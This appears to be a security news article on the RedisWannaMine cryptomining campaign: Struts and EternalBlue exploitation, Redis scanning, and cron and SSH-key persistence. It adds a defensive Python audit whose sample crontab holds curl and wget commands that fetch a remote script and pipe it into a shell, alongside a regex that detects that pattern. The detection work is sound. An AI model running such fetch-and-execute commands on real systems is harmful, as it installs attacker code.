Security researcher Nadav Avital uncovered a cryptocurrency-mining operation, named RedisWannaMine, that targets database and application servers by exploiting the notorious EternalBlue.
RedisWannaMine exploits CVE-2017-9805, a remote code execution (RCE) vulnerability in Apache Struts, an open-source framework for developing Java web applications that is reportedly used by at least 65% of Fortune 100 companies. The operators of RedisWannaMine exploit this flaw to run a shell command that downloads cryptocurrency-mining malware.
When the researchers followed the operation’s trail, they also found a shell script responsible for:
Downloading cryptocurrency-mining malware
Gaining persistence through new entries in crontab, the time-based job scheduler on Linux systems
Getting remote access to the affected system through a new Secure Shell (SSH) key entry
RedisWannaMine’s attack chain also involves scanning for vulnerable Redis servers (an open-source in-memory data store commonly used as a database) on port 6379 and infecting them with cryptocurrency-mining malware. It also uses a transmission control protocol (TCP) scanner to search for hosts with port 445 open, the default port of Server Message Block (SMB), and then exploits EternalBlue on them to drop the miner and spread further.
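As an added defender-side example (not code from the original article or from the researchers), the following Python audit flags the two persistence mechanisms described above: cron entries that fetch a remote script and pipe it into a shell, and SSH authorized_keys entries whose key material is not on an allowlist. The sample crontab, the key strings and the 198.51.100.10 address are constructed for the example; on a real host the inputs would be /etc/crontab, /var/spool/cron/* and each user's ~/.ssh/authorized_keys.

```python
import re
from typing import List, Set

# A fetch tool (curl/wget) whose output is fed straight into a shell is the
# download-and-execute shape of the cron persistence described in the article.
DOWNLOAD_EXEC_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
# Key-type tokens that start the key material in an authorized_keys line.
KEY_TYPE_RE = re.compile(r"^(ssh-|ecdsa-|sk-)")


def flag_cron_entries(crontab_text: str) -> List[str]:
    """Return crontab lines whose command part looks like download-and-execute."""
    flagged = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # @reboot/@hourly style entries have one schedule field, others have five.
        n = 1 if line.startswith("@") else 5
        fields = line.split(None, n)
        if len(fields) != n + 1:
            continue
        if DOWNLOAD_EXEC_RE.search(fields[n]):
            flagged.append(line)
    return flagged


def flag_unknown_keys(authorized_keys_text: str, known_keys: Set[str]) -> List[str]:
    """Return authorized_keys lines whose base64 key material is not in the allowlist."""
    flagged = []
    for raw in authorized_keys_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()  # simple split; quoted options containing spaces are not handled
        for i, tok in enumerate(tokens):
            # Skip any leading options field (e.g. no-pty) and locate the key type.
            if KEY_TYPE_RE.match(tok) and i + 1 < len(tokens):
                if tokens[i + 1] not in known_keys:
                    flagged.append(line)
                break
    return flagged


# Constructed sample inputs (not real captures); 198.51.100.10 is a documentation address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://198.51.100.10/x.sh | sh
@reboot wget -q -O- http://198.51.100.10/r.sh | bash
"""
KNOWN_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY"}  # constructed allowlist
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY admin@bastion
no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLEUNKNOWN unknown@unknown
"""
```

Running `flag_cron_entries(SAMPLE_CRONTAB)` reports the two fetch-and-execute entries and leaves the logrotate job alone, while `flag_unknown_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEYS)` reports only the key absent from the allowlist.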
Indeed, these types of malware are becoming as widespread as the cryptocurrencies themselves. In fact, cryptocurrency mining was the most detected network event on devices connected to home routers, peaking at over 23 million in the third quarter of 2017.
[Figure: Trend Micro’s proactive solutions against fileless cryptocurrency-mining malware]
Given that RedisWannaMine targets servers, it could significantly affect the organizations that run them. Apart from increasing power consumption, it also risks disrupting operations, since the malware consumes computing resources to mine cryptocurrency.
More importantly, RedisWannaMine also highlights the real-life significance of patching and the importance of adopting best practices for system administrators responsible for watching over their company’s online perimeter. This is particularly true for organizations that build, use, and deploy their own web applications, as they need to integrate security at each level of the application lifecycle. Just like other threats that weaponized potent exploits, one vulnerable device is all it takes to affect all systems connected to it.